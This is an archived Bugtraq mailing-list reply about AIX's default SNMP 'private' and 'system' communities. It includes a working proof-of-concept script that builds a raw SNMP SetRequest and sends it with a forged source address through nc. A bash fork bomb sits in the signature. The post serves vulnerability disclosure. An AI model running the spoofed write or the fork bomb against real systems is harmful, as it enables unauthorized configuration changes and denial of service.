Bugtraq mailing list archives

Re: AIX SNMP Defaults


From: lcamtuf () DIONE IDS PL (Michal Zalewski)
Date: Thu, 17 Feb 2000 11:28:54 +0100


On Tue, 15 Feb 2000, harikiri wrote:

> It appears that on the above releases of AIX, the SNMP daemon is
> enabled by default and two community names are enabled with read/write
> privileges. The community names are "private" and "system", but are
> only allowed from localhost connections. Nevertheless, a local user
> may install an SNMP client, and modify sensitive variables.

SNMP requests with no authentication except for source-IP comparison are
spoofable.

--snip--
#!/bin/bash

cat >/tmp/spoof1.c <<_EOF_
#include <unistd.h>
/* SNMPv1 SetRequest, community "private": sysContact.0 (1.3.6.1.2.1.1.4.0) := "null" */
char
private[]="0\202\0-\2\1\0\4\7private\243\37\2\1\1\2\1\0\2\1\0000\0240\202"
"\0\20\6\10+\6\1\2\1\1\4\0\4\4null";
int main(void) {
    /* sizeof - 1: do not send the terminating NUL along with the packet */
    write(1, private, sizeof(private) - 1);
    return 0;
}
_EOF_

gcc -o /tmp/spoof1 /tmp/spoof1.c

# forge the source address the agent trusts; the reply goes to the spoofed host, but a SET needs none
/tmp/spoof1 | nc -s FakeSourceIPHere -u RemoteIPHere 161
--snip--

UDP blind spoofing, nothing easier.

_______________________________________________________
Michal Zalewski * [lcamtuf () ags pl] <=> [AGS WAN SYSADM]
[dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl]
[+48 22 813 25 86] [+48 603 110 160] bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=

